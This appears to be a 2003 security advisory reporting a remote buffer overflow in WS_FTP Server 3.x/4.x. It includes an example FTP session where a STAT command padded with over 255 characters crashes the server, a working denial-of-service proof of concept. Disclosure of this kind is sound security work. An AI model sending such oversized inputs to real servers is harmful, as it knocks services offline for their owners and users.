Product: WS_FTP Server
Version: 3.x, 4.x

Vulnerability: Remote buffer overflow in FTP command Handling
Release Date: 3/9/2003

Description:

Sending more that 255 characters as input to FTP commands like STAT and APPE will cause a buffer overflow in ftp server.

Example session:

ftp xx.xx.xx.xx
Connected to xx.xx.xx.xx.
220-yy.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 yy.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Connection closed by remote host.
ftp>

The connection is Closed and server is crashed.

This Vulnerability has been Discoverd By Pejamn Davarzani (pejman hat-squad com)